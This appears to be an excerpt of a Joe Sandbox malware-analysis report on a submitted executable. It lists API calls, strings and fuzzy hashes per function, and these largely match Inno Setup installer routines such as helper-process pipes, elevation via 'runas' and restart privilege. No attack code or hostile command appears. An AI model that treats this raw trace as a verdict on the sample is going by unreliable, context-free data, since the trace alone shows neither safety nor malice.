                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: 6d92aa0cb1a2d53983b86e461a62a4ce5a5a47657027c2647c88d78d486bc28e
                                                                                                      • Instruction ID: 6bd7adec2090487eae29abc1928bf57af59456791c97a49d6ef8c5917aacc84c
                                                                                                      • Opcode Fuzzy Hash: 6d92aa0cb1a2d53983b86e461a62a4ce5a5a47657027c2647c88d78d486bc28e
                                                                                                      • Instruction Fuzzy Hash: 0E1148742007069BC710DF19D880B86FBE5EB98390B10C53BE9588B385D374E8558BA9
APIs
• GetLastError.KERNEL32(00000000,00453019), ref: 00452FFB
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
• Opcode ID: 0834ab1e0ff74d13c83467379b9d37ae80668f7e4bd4fe23633cfebca466aa95
• Instruction ID: 3702fe8876d82bde104835ae14f19b545f9b4323f369928b31ff8c7c86e788f0
• Opcode Fuzzy Hash: 0834ab1e0ff74d13c83467379b9d37ae80668f7e4bd4fe23633cfebca466aa95
• Instruction Fuzzy Hash: 32014C356043086A8B10CF69AC004AEFBE8DB4D7217108277FC14D3382DA744E0496E4
APIs
• VirtualFree.KERNEL32(?,?,00004000,?,?,?,00003640,00007643,00401973), ref: 00401766
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
• Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
• Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
• Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
APIs
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: b938081ec37ef3dcaeb0613a6c9f19dce7446eae7aee343fbba8aa446800b67d
• Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
• Opcode Fuzzy Hash: b938081ec37ef3dcaeb0613a6c9f19dce7446eae7aee343fbba8aa446800b67d
• Instruction Fuzzy Hash:
APIs
• GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
• SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
• LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
• SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
• GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
• GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
• GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
• GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
• GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
• GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
• GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
• GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
• GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
• GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
• FreeLibrary.KERNEL32(00000001,?,00419000,00000000,?,?,?,00000001), ref: 0041F27F
Strings
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
• String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
• API String ID: 2323315520-3614243559
• Opcode ID: 7561659b3b600d63638f3944902fd7923d8484a487a3f9680a3db5d0744bedbe
• Instruction ID: d5058fc073e0ad59750b6b6eed82d26134d8568d962b0a84cfd108907e917b52
• Opcode Fuzzy Hash: 7561659b3b600d63638f3944902fd7923d8484a487a3f9680a3db5d0744bedbe
• Instruction Fuzzy Hash: 8D310DB2640700EBEB01EBB9AC86A663294F728724745093FB508DB192D77C5C49CB1C
APIs
• GetTickCount.KERNEL32 ref: 00458993
• QueryPerformanceCounter.KERNEL32(02073858,00000000,00458C26,?,?,02073858,00000000,?,00459322,?,02073858,00000000), ref: 0045899C
• GetSystemTimeAsFileTime.KERNEL32(02073858,02073858), ref: 004589A6
• GetCurrentProcessId.KERNEL32(?,02073858,00000000,00458C26,?,?,02073858,00000000,?,00459322,?,02073858,00000000), ref: 004589AF
• CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00458A25
• GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02073858,02073858), ref: 00458A33
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,00458BE2), ref: 00458A7B
• SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00458BD1,?,00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,00458BE2), ref: 00458AB4
  • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
• CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458B5D
• CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 00458B93
• CloseHandle.KERNEL32(000000FF,00458BD8,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458BCB
  • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
Strings
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
• String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
• API String ID: 770386003-3271284199
• Opcode ID: b3cb95de96f0a494fe77a0225261b47a74f516519aada3d90b4a318c7d3773ef
• Instruction ID: 46381a2ef6f5f7687f8d932114089cfc0a3b3023078b53c1614b04e084b280c9
• Opcode Fuzzy Hash: b3cb95de96f0a494fe77a0225261b47a74f516519aada3d90b4a318c7d3773ef
• Instruction Fuzzy Hash: 02711370A04348AEDB11DB69CC41B5EBBF8EB15705F1084BAB944FB282DB7859488B69
                                                                                                      APIs
                                                                                                        • Part of subcall function 0047828C: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02072BDC,?,?,?,02072BDC,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782A5
                                                                                                        • Part of subcall function 0047828C: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004782AB
                                                                                                        • Part of subcall function 0047828C: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02072BDC,?,?,?,02072BDC,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782BE
                                                                                                        • Part of subcall function 0047828C: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02072BDC,?,?,?,02072BDC), ref: 004782E8
                                                                                                        • Part of subcall function 0047828C: CloseHandle.KERNEL32(00000000,?,?,?,02072BDC,00478450,00000000,0047856E,?,?,-00000010,?), ref: 00478306
                                                                                                        • Part of subcall function 00478364: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004783F6,?,?,?,02072BDC,?,00478458,00000000,0047856E,?,?,-00000010,?), ref: 00478394
                                                                                                      • ShellExecuteEx.SHELL32(0000003C), ref: 004784A8
                                                                                                      • GetLastError.KERNEL32(00000000,0047856E,?,?,-00000010,?), ref: 004784B1
                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004784FE
                                                                                                      • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478522
                                                                                                      • CloseHandle.KERNEL32(00000000,00478553,00000000,00000000,000000FF,000000FF,00000000,0047854C,?,00000000,0047856E,?,?,-00000010,?), ref: 00478546
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                                                      • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                                      • API String ID: 883996979-221126205
                                                                                                      • Opcode ID: 7bc79704bed3dd733a1086ace77ac7314c1c869dae30f57a13a5b111f7ab0a8e
                                                                                                      • Instruction ID: be90243bdd9c3757315ff9bbcfcad83cd6a8df60a98d136a70e83fac94f3d3e4
                                                                                                      • Opcode Fuzzy Hash: 7bc79704bed3dd733a1086ace77ac7314c1c869dae30f57a13a5b111f7ab0a8e
                                                                                                      • Instruction Fuzzy Hash: E0314670A40609BEDB11EFAAD845ADEB6B8EF05314F50847FF518E7281DB7C89058B19
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422A04
                                                                                                      • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BCE), ref: 00422A14
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSendShowWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1631623395-0
                                                                                                      • Opcode ID: ba2239a6b7e39db5a6c256e0bd052b844ec1d952261cb85ab3a20d26880a6eee
                                                                                                      • Instruction ID: ac1ceeab966790095f9612ce7a7db5e594191b89627cdcc61fab65d1acc55ab9
                                                                                                      • Opcode Fuzzy Hash: ba2239a6b7e39db5a6c256e0bd052b844ec1d952261cb85ab3a20d26880a6eee
                                                                                                      • Instruction Fuzzy Hash: 79914071B04214BFD711EFA9DA86F9D77F4AB04314F5500BAF504AB3A2CB78AE409B58
                                                                                                      APIs
                                                                                                      • IsIconic.USER32(?), ref: 004183A3
                                                                                                      • GetWindowPlacement.USER32(?,0000002C), ref: 004183C0
                                                                                                      • GetWindowRect.USER32(?), ref: 004183DC
                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 004183EA
                                                                                                      • GetWindowLongA.USER32(?,000000F8), ref: 004183FF
                                                                                                      • ScreenToClient.USER32(00000000), ref: 00418408
                                                                                                      • ScreenToClient.USER32(00000000,?), ref: 00418413
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                                      • String ID: ,
                                                                                                      • API String ID: 2266315723-3772416878
                                                                                                      • Opcode ID: 6217f91ca86bc21168c1a31dc77beadf87db026dacfe8a4e2043101b83599555
                                                                                                      • Instruction ID: f1655e9c1aaa1f9d3e17845697c0dfec8ab0781743990dff6cd0a114faef5a7c
                                                                                                      • Opcode Fuzzy Hash: 6217f91ca86bc21168c1a31dc77beadf87db026dacfe8a4e2043101b83599555
                                                                                                      • Instruction Fuzzy Hash: D6112B71505201AFDB00EF69C885F9B77E8AF49314F18067EBD58DB286D738D900CBA9
                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(00000028), ref: 004555DF
                                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555E5
                                                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004555FE
                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455625
                                                                                                      • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045562A
                                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 0045563B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                      • API String ID: 107509674-3733053543
                                                                                                      • Opcode ID: 905e5c4f0c040865ada5a790a5680192090f128290145b13f19b3701cccf3d3d
                                                                                                      • Instruction ID: f0f78ca649e8ddc1473c2e21848b41e7847a09c75f53dffa28e6f5675cd8c776
                                                                                                      • Opcode Fuzzy Hash: 905e5c4f0c040865ada5a790a5680192090f128290145b13f19b3701cccf3d3d
                                                                                                      • Instruction Fuzzy Hash: 32F0F670284B42B9E610AA758C13F3B21C89B40B49F80083EBD09EA1C3D7BDC80C4A2F
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045D4F5
                                                                                                      • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045D505
                                                                                                      • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D515
                                                                                                      • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047F47B,00000000,0047F4A4), ref: 0045D53A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$CryptVersion
                                                                                                      • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                                      • API String ID: 1951258720-508647305
                                                                                                      • Opcode ID: 6323a5a980eb8feb456ca02504bfb6ad995229d531f09a6584140c28355fd360
                                                                                                      • Instruction ID: 2c2546d05897d0e560449e180de6b9da44e6f0241588afb6de3da162f6531889
                                                                                                      • Opcode Fuzzy Hash: 6323a5a980eb8feb456ca02504bfb6ad995229d531f09a6584140c28355fd360
                                                                                                      • Instruction Fuzzy Hash: 3AF012F0940704EBEB18DFB6BCC67623695ABD531AF14C137A404A51A2E778044CCE1D
                                                                                                      APIs
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,00497BB2,?,?,00000000,0049B628,?,00497D3C,00000000,00497D90,?,?,00000000,0049B628), ref: 00497ACB
                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00497B4E
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,00497B8A,?,00000000,?,00000000,00497BB2,?,?,00000000,0049B628,?,00497D3C,00000000), ref: 00497B66
                                                                                                      • FindClose.KERNEL32(000000FF,00497B91,00497B8A,?,00000000,?,00000000,00497BB2,?,?,00000000,0049B628,?,00497D3C,00000000,00497D90), ref: 00497B84
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFind$AttributesCloseFirstNext
                                                                                                      • String ID: isRS-$isRS-???.tmp
                                                                                                      • API String ID: 134685335-3422211394
                                                                                                      • Opcode ID: ba647548f34564e7f56f6c808fa7faec3af05a969934c2433d5159a38f0bbcda
                                                                                                      • Instruction ID: b2847bb1a44685988a55541ee7ac685ebeb66ffb5e30493f66813578f7a68db2
                                                                                                      • Opcode Fuzzy Hash: ba647548f34564e7f56f6c808fa7faec3af05a969934c2433d5159a38f0bbcda
                                                                                                      • Instruction Fuzzy Hash: A63165719146186FCF10EF65CC41ADEBBBCDB45318F5084F7A808A32A1E638AE458F58
                                                                                                      APIs
                                                                                                      • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457449
                                                                                                      • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457470
                                                                                                      • SetForegroundWindow.USER32(?), ref: 00457481
                                                                                                      • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,0045775B,?,00000000,00457797), ref: 00457746
                                                                                                      Strings
                                                                                                      • Cannot evaluate variable because [Code] isn't running yet, xrefs: 004575C6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                                      • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                                      • API String ID: 2236967946-3182603685
                                                                                                      • Opcode ID: fe95ac23089f8abddac86e3d9ae11b4981b9e88786854755ce7e63a50dbcddc8
                                                                                                      • Instruction ID: 5bc10c0d354cae83c82450a0913647aad13fd3ad71d4eb48676ad76960377df7
                                                                                                      • Opcode Fuzzy Hash: fe95ac23089f8abddac86e3d9ae11b4981b9e88786854755ce7e63a50dbcddc8
                                                                                                      • Instruction Fuzzy Hash: D9910034608204EFD715CF54E991F5ABBF9EB89305F2180BAED0897792D638AE04DF58
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F37), ref: 00455E28
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E2E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                      • API String ID: 1646373207-3712701948
                                                                                                      • Opcode ID: b5f149e20a31f3d313834126475bcf244ddb8ed42aa7b007c000aa6233a22d25
                                                                                                      • Instruction ID: 12dfdd1b414f9b5fa57bb507e68127e36b1c1a940f154b23c6ee37fdedd7ee09
                                                                                                      • Opcode Fuzzy Hash: b5f149e20a31f3d313834126475bcf244ddb8ed42aa7b007c000aa6233a22d25
                                                                                                      • Instruction Fuzzy Hash: 66415171A04649AFCF01EFA5C8929EFB7B8EF49304F508566F800F7252D6785E09CB69
                                                                                                      APIs
                                                                                                      • IsIconic.USER32(?), ref: 00417D1F
                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                                                      • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                                                      • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
